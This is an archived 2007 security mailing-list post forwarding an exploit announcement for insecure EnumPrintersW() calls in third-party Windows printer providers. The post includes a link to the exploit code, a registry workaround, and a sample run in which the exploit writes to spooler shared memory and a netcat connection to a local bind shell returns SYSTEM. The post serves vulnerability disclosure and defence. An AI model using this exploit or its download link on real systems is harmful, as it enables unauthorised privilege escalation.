[exploits] Fwd: Universal printer provider exploit for Windows

Mon Jan 29 08:54:36 CST 2007

Didn't check it out yet, forwarded it first, let me know what you guys think.

----------  Forwarded Message  ----------

Subject: Fwd: Universal printer provider exploit for Windows
Date: Monday 29 January 2007 16:24
From: "Andres Tarasco" <atarasco at gmail.com>
To: news at securiteam.com

We have developed a new exploit that should allow code execution as SYSTEM
with the following software:

- DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED
-0day!!!
- Citrix Metaframe - cpprov.dll - FIXED
- Novell (nwspool.dll - CVE-2006-5854 - untested. pls give feedback)
More information at :
http://www.514.es/2007/01/universal_exploit_for_vulnerab.html
(spanish)
exploit code:
http://www.514.es/2007/01/29/Universal_printer_provider_exploit.zip

/*
Title: Universal exploit for vulnerable printer providers (spooler service).

 Vulnerability: Insecure EnumPrintersW() calls
 Author: Andres Tarasco Acuña - atarasco at 514.es
 Website: http://www.514.es

 This code should allow to gain SYSTEM privileges with the following
software:
 blink !blink! blink!

 - DiskAccess NFS Client (dapcnfsd.dll v0.6.4.0) - REPORTED & NOTFIXED
-0day!!!
 - Citrix Metaframe - cpprov.dll  - FIXED
 - Novell (nwspool.dll  - CVE-2006-5854 - untested)
 - More undisclosed stuff =)

  If this code crashes your spooler service (spoolsv.exe) check your
  "vulnerable" printer providers at:
  HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Print\Providers

  Workaround: Trust only default printer providers "Internet Print Provider"

  and "LanMan Print Services" and delete the other ones.

  And remember, if it doesnt work for you, tweak it yourself. Do not ask

  D:\Programación\EnumPrinters\Exploits>testlpc.exe
 [+] Citrix Presentation Server - EnumPrinterW() Universal exploit
 [+] Exploit coded by Andres Tarasco - atarasco at 514.es

 [+] Connecting to spooler LCP port \RPC Control\spoolss
 [+] Trying to locate valid address (1 tries)
 [+] Mapped memory. Client address: 0x003d0000
 [+] Mapped memory. Server address: 0x00a70000
 [+] Targeting return address to  : 0x00A700A7
 [+] Writting to shared memory...
 [+] Written 0x1000 bytes
 [+] Exploiting vulnerability....
 [+] Exploit complete. Now Connect to 127.0.0.1:51477

 D:\Programación\EnumPrinters>nc localhost 51477
 Microsoft Windows XP [Versión 5.1.2600]
 (C) Copyright 1985-2001 Microsoft Corp.

 C:\WINDOWS\system32>whoami
 NT AUTHORITY\SYSTEM

regards,

Andres Tarasco

--
Andres Tarasco

-------------------------------------------------------

-- 
  Noam Rathaus
  CTO
  1616 Anderson Rd.
  McLean, VA 22102
  Tel: 703.286.7725 extension 105
  Fax: 888.667.7740
  noamr at beyondsecurity.com
  http://www.beyondsecurity.com